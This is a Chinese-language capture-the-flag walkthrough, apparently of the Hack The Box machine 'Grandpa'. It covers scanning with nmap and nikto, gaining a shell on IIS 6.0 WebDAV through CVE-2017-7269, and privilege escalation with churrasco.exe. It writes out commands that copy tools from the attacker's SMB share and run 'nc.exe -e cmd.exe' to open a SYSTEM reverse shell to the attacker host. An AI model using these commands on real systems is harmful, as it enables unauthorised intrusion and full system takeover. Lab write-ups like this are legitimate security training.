基本和granny差不多
预备知识
nikto、nmap、iis6.0的webdav
windows低权限用户可写的目录
CVE:2017-7269、巴西烤肉(churrasco.exe)
信息收集和获取立足点
先探测端口服务
nmap 10.10.10.14
只开了一个80的http,先浏览器访问一下
只是一个报错页面,nikto探测一下
nikto -h http://10.10.10.14
输出结果,可以看到是iis6.0,而且有DAV还有MicrosoftOfficeWebServer
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
感觉和之前的granny一样,用之前的exp打一下,运气很好,shell直接弹回来了
权限比较低
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
权限提升
机器是台2003,所以可以考虑之前用过的churrasco,俗称巴西烤肉
先在本地起一个smbserver,然后在shell上下载
sudo cp /usr/share/sqlninja/apps/churrasco.exe /var/www/html/
sudo smbserver.py share `pwd`
net use \\10.10.14.4\share
copy \\10.10.14.4\share\churrasco.exe
不过这些都失败了,因为目录没法写
只能进个可写的目录,查了下,看到篇文章:windows 找可写目录最后找了个可写目录C:\WINDOWS\Temp>
net use \\10.10.14.4\share
copy \\10.10.14.4\share\churrasco.exe
copy \\10.10.14.4\share\nc.exe
churrasco.exe -d "C:\WINDOWS\Temp\nc.exe -e cmd.exe 10.10.14.4 8888"
输出结果
listening on [any] 8888 ...
10.10.10.14: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.14] 1038
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system